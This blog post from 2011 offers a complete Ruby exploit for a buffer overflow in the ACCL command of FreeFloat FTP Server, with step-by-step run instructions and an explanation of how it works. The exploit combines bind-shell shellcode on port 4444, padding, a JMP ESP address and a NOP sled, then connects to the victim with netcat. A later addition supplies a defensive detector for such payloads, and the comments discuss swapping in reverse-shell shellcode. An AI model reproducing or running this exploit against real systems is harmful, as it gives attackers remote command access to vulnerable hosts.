Posted on Wednesday, 20th July 2011 by Michael
Ruby exploit for FreeFloat FTP Server ACCL Buffer Overflow and remote shell
The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a stand-alone executable FTP server that requires no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. The trick, though, is not to make it crash but to gain shell access; Mortis originally published the working exploit in Python. What we have done here is convert it into a Ruby exploit. Why? Simply because, while learning Ruby, I took it as a challenge to test what I have learned.
Exploiting the vulnerability
To test the actual exploit, download the vulnerable software and install it on a Windows XP SP3 machine: http://www.freefloat.com/software/freefloatftpserver.zip. Next, on a Linux machine, copy the Ruby code provided, save it to a file called ftpexploit.rb and chmod it to 777. To run the exploit, type ./ftpexploit.rb and enter the victim's IP. If the exploit is successful you will get a Windows shell.
The Exploit
#!/usr/bin/ruby
#
#FreeFloat FTP SERVER ACCL BUFFER OVERFLOW and remote shell Exploit
#Original Exploit by: Mortis as found on exploit-db.com
#Code redesigned into ruby by genxweb from digitaloffensive.com
###############################################################
###############################################################
require 'socket'
puts "Enter the IP to Exploit: "
# gets returns nil at end of input; to_s keeps chomp from raising in that case
victim = gets.to_s.chomp
#open listener shell on port 4444
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
padding = "A"*246
sled = "\x90"*20
jmpesp = "\x13\x44\x87\x7c"
sploit = "#{padding}#{jmpesp}#{sled}#{sc}"
# TCPsocket was a deprecated alias that no longer exists in current Ruby
s = TCPSocket.new(victim, 21)
s.recv(1024)
s.puts("USER test\r\n")
s.recv(1024)
s.puts("PASS test\r\n")
s.recv(1024)
s.puts("ACCL "+sploit+"\r\n")
s.close()
puts "#### IF EXPLOIT IS SUCCESSFUL SHELL WILL OPEN ####"
puts "###################################################"
system("nc #{victim} 4444")
How the code works
First we ask the user for the victim's IP address. Once we have that we remove the trailing newline with chomp. Now that we have the victim's IP we build the packet that will be sent over the socket we open.
The first part of the packet is the padding and sled. This gets us to the point where we can overwrite memory with our shellcode. The jmpesp variable is the address in memory, in big endian format, at which to enter our shellcode. The shellcode is a generic shellcode that opens port 4444 on the victim's machine with Windows command-line access.
Once the packet is built we open a connection to the victim on port 21, the standard FTP port. Once the connection is established we send the user test and password test. After that we send the ACCL command with the exploit packet. If this is successful a shell will spawn on the victim's box.
Finally the exploit uses netcat (nc) to connect to the victim's machine so you can interact with it.
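For the defensive side of the same packet layout, here is an added example (not part of the original post) that inspects FTP control-channel lines and flags the traits of the ACCL payload described above: an unknown verb, an argument far longer than any real FTP argument, non-printable bytes where machine code and a NOP sled sit, and a long run of one repeated filler byte. The verb list, thresholds and sample session are assumptions constructed for illustration.

```ruby
# Added example, not from the original post: flag FTP command lines shaped
# like the ACCL overflow payload. Thresholds and verb list are assumptions.
MAX_ARG_LEN    = 200   # real FTP arguments are far shorter than the 246+ byte filler
MIN_RUN_LEN    = 100   # a run of one repeated byte this long looks like padding
STANDARD_VERBS = %w[USER PASS ACCT CWD PWD LIST RETR STOR QUIT TYPE PASV PORT SYST NOOP]

# Inspect one command line. Returns nil when nothing looks wrong,
# otherwise an array of human-readable reasons.
def inspect_ftp_command(line)
  # Work on raw bytes so invalid UTF-8 in a payload cannot raise mid-check.
  verb, _, arg = line.b.chomp.partition(" ")
  reasons = []
  reasons << "unknown verb #{verb}" unless STANDARD_VERBS.include?(verb.upcase)
  reasons << "argument length #{arg.bytesize} exceeds #{MAX_ARG_LEN}" if arg.bytesize > MAX_ARG_LEN
  # Shellcode and NOP sleds contain bytes outside printable ASCII.
  nonprint = arg.each_byte.count { |b| b < 0x20 || b > 0x7e }
  reasons << "#{nonprint} non-printable bytes" if nonprint > 0
  # A long run of a single repeated byte is the signature of filler padding.
  run = arg.match(/(.)\1{#{MIN_RUN_LEN - 1},}/m)
  reasons << "run of #{run[0].bytesize} repeated #{run[1].inspect} bytes" if run
  reasons.empty? ? nil : reasons
end

# Scan a whole session (array of lines); returns [line_index, reasons] pairs.
def scan_ftp_session(lines)
  lines.each_with_index.map { |l, i| (r = inspect_ftp_command(l)) ? [i, r] : nil }.compact
end

# Constructed sample session: a normal login, then a line shaped like the
# payload above (246 bytes of filler, a 4-byte address, a 20-byte NOP sled
# and four stand-in non-printable bytes in place of real shellcode).
PAYLOAD_LINE = "ACCL " + "A" * 246 +
               [0x13, 0x44, 0x87, 0x7c].pack("C*") +   # the post's jmpesp bytes
               ([0x90].pack("C") * 20) +               # NOP sled
               [0xcc, 0xcc, 0xcc, 0xcc].pack("C*") +   # stand-in for shellcode
               "\r\n"
SAMPLE_SESSION = ["USER test\r\n", "PASS test\r\n", PAYLOAD_LINE, "QUIT\r\n"]

if __FILE__ == $0
  scan_ftp_session(SAMPLE_SESSION).each do |i, reasons|
    puts "line #{i}: #{reasons.join('; ')}"
  end
end
```

Running the block prints a single alert for line 2 listing all four traits; the login and QUIT lines pass silently.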
Posted in Security Advisories | Comments (2)
July 20th, 2011 at 4:47 pm
Great work dude. Rather than opening up a shell and trying to netcat in (they might be firewalled), how can we easily make it so the shellcode is interchangeable? What if there was a list of different shellcodes to insert? Kind of like metasploit/core impact but just with this one script.
July 20th, 2011 at 10:04 pm
John, adding that functionality is just a matter of finding the jmpesp where the app crashes on the arch in question, then finding shellcode that will run in that space. Once I have time I am going to look at the metasploit shellcode to see if there is a reverse shell for Windows 7 and test on that. I could also add the functionality to grab the banner and only run the exploit if it is FreeFloat.